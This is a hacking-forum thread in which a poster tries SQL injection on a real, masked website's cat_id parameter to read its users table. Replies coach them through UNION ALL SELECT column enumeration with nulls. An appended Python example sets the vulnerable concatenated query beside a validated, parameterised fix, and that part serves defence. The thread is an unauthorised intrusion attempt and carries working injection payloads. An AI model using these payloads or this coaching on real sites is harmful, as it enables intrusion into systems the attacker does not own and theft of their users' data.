
BLIND SQL INJECTION SO CLOSE


ghost's Avatar
0 0

I found a vulnerable site that does the following in the URL:

http://www.***************.com/directory.php?cat_id=

Then I did:

http://www.***************.com/directory.php?cat_id=-1%20UNION%20ALL%20SELECT%20*%20FROM%20users

It spat out this:

The used SELECT statements have a different number of columns

I tried a couple of things after http://www.**************.com/directory.php?cat_id=-1%20UNION%20ALL%20SELECT%20 but I'm quite stuck. Any suggestions from you experts?


ghost's Avatar
0 0

I really did a lot they said


ghost's Avatar
0 0

This is because the union select and the original select must select the SAME amount of columns, no more, no less. You can't just use * as a wildcard. Instead, keep nulling out column by column until you do not get that same error.

So instead of union all select * from wherever/* do:

union all select null from wherever/*
union all select null, null from wherever/*
union all select null, null, null from wherever/*

and so on.


synstealth's Avatar
PHP WARRIOR
2,490 1

Use union ALL select to trick the query into thinking they have the correct columns if you want to pull something from another table using a table that exists on the server.


ghost's Avatar
0 0

Yeah, use nulls to make the two tables have the same columns.
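
Added example, not part of the thread and not the site's code: the weak handling of `cat_id` that produces the column-count error quoted in the first post, beside a corrected handler that validates the value, binds it as a parameter and keeps database errors server-side. It uses Python with an in-memory SQLite database in place of the site's PHP and MySQL, so the error wording differs; the table names, columns and function names are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed sample schema and rows (assumed names, not the real site's).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE listings (id INTEGER, cat_id INTEGER, title TEXT);
        CREATE TABLE users (id INTEGER, name TEXT, email TEXT, pw_hash TEXT);
        INSERT INTO listings VALUES (1, 7, 'Plumbers'), (2, 7, 'Electricians');
        INSERT INTO users VALUES (1, 'admin', 'admin@example.test', 'x');
    """)
    return db

def listing_vulnerable(db, cat_id):
    # Weak form: the request parameter is concatenated into the SQL text and
    # the raw database error is echoed back to the client.
    sql = "SELECT id, title FROM listings WHERE cat_id = " + cat_id
    try:
        return 200, db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, str(exc)

def listing_hardened(db, cat_id):
    # Corrected form: accept only a short run of ASCII digits, pass the value
    # as a bound parameter, and return a generic message on database errors.
    if not re.fullmatch(r"[0-9]{1,9}", cat_id):
        return 400, "invalid category"
    try:
        rows = db.execute(
            "SELECT id, title FROM listings WHERE cat_id = ? ORDER BY id",
            (int(cat_id),),
        ).fetchall()
        return 200, rows
    except sqlite3.Error:
        return 500, "internal error"

def bound_only(db, cat_id):
    # Binding alone, without validation: the whole string is compared as data
    # and never parsed as SQL, so no UNION is ever executed.
    return db.execute(
        "SELECT id, title FROM listings WHERE cat_id = ?", (cat_id,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = "-1 UNION ALL SELECT * FROM users"  # the value from the first post
    print(listing_vulnerable(db, probe))  # database error text reaches the client
    print(listing_hardened(db, probe))    # rejected before any SQL runs
    print(listing_hardened(db, "7"))      # normal request still works
```
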